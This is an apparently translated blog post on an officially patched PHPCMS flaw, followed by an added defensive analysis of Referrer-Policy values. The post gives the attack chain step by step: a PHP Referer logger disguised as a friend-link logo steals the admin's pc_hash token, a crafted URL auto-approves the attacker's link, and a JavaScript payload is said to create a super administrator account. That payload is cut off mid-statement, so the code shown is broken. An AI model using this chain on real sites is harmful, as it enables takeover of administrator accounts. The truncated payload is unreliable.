PHPCMS: Combining Techniques for CSRF Attacks

Source: Internet
Author: User

As we all know, once you log in to the phpcms admin backend, a pc_hash value serves as the token that prevents CSRF attacks. So how can a combination of techniques still be used to perform a CSRF attack?

After phpcms is installed, visitors can apply for friend links by default. There are two types of links: text links and image links. The image link is the interesting one: when the administrator reviews the application, the image is displayed directly in the backend. The backend URL contains the pc_hash, so the pc_hash can be found in the Referer of the image request. The method is as follows. First, I wrote a script locally that records the Referer:

<?php
// Record the Referer header of the incoming request.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
file_put_contents('referer.txt', $referer);
?>

Then, use this script as the image address when applying for a friend link. When the administrator opens the "Friendship link" function in the backend, I have already stolen their pc_hash. In practice this can be made to look more convincing: for example, if the PHP script outputs a real logo, it not only captures the pc_hash but also looks like a genuine friend link application. I have now obtained the Referer locally.

So what can I do with the pc_hash? CSRF, of course. Here is a simple example. I can construct the following link:

http://localhost/phpcms/index.php?m=link&c=link&a=check&linkid=4&pc_hash=lrP5dK

Disguised as an image shown to the administrator, it causes the link with id = 4, which is the friend link I just applied for, to be reviewed and approved. Let's try another one.
Gum = function () {
    var u = {
        'version': '000000',
        'domain': '{domain}',
        'backinfo': {},
        'author': 'https://github.com/quininer/gum'
    };
    u.e = function (code) { try { return eval(code) } catch (e) { return '' } };
    u.name = function (names) { return document.getElementsByTagName(names); };
    u.html = function () { return u.name('html')[0] || document.write('

Change pc_hash to the value you obtained, then place the above code on any HTML page (any domain will do) and trick the administrator into visiting it. This adds a super administrator account named test, with the password 123123, to the target site.

Solution: No good suggestions. Do not put pc_hash in the URL.
Officially patched
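
The leak described above depends on the browser sending the full backend URL as the Referer of the third-party image request. The following added example (not part of the original article or of phpcms) models which Referrer-Policy values let a pc_hash query parameter reach the image host; the host names and token value are constructed, and the policy logic is simplified from the Referrer Policy specification.

```javascript
// Added example: models the Referer header a browser attaches to a
// subresource request under each Referrer-Policy (simplified from the spec:
// "downgrade" here means an https page requesting a non-https resource).
function refererFor(pageUrl, resourceUrl, policy) {
  const page = new URL(pageUrl);
  const res = new URL(resourceUrl);
  // Credentials and the fragment are never sent in a Referer.
  page.username = '';
  page.password = '';
  page.hash = '';
  const full = page.href;
  const originOnly = page.origin + '/';
  const sameOrigin = page.origin === res.origin;
  const downgrade = page.protocol === 'https:' && res.protocol !== 'https:';
  switch (policy) {
    case 'no-referrer': return '';
    case 'unsafe-url': return full;
    case 'origin': return originOnly;
    case 'same-origin': return sameOrigin ? full : '';
    case 'strict-origin': return downgrade ? '' : originOnly;
    case 'no-referrer-when-downgrade': return downgrade ? '' : full;
    case 'origin-when-cross-origin': return sameOrigin ? full : originOnly;
    case 'strict-origin-when-cross-origin':
      return sameOrigin ? full : (downgrade ? '' : originOnly);
    default: throw new Error('unknown policy: ' + policy);
  }
}

// True when the outgoing Referer still carries the named query parameter.
function leaksParam(referer, name) {
  return referer !== '' && new URL(referer).searchParams.has(name);
}

// Constructed sample values (hypothetical hosts and token).
const ADMIN_PAGE = 'https://cms.example/index.php?m=link&c=link&pc_hash=CONSTRUCTED';
const REMOTE_LOGO = 'https://img.example/logo.php';
const POLICIES = ['no-referrer', 'unsafe-url', 'origin', 'same-origin',
  'strict-origin', 'no-referrer-when-downgrade', 'origin-when-cross-origin',
  'strict-origin-when-cross-origin'];

// Map each policy to whether pc_hash reaches the third-party image host.
function auditPolicies() {
  const report = {};
  for (const policy of POLICIES) {
    report[policy] = leaksParam(refererFor(ADMIN_PAGE, REMOTE_LOGO, policy), 'pc_hash');
  }
  return report;
}

console.log(auditPolicies());
```

Only `unsafe-url` and `no-referrer-when-downgrade` (the long-standing browser default before `strict-origin-when-cross-origin` replaced it) pass the token to the image host. A restrictive policy on backend pages limits this one channel, but a token in the URL still ends up in logs and browser history, so keeping pc_hash out of the URL remains the actual fix.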
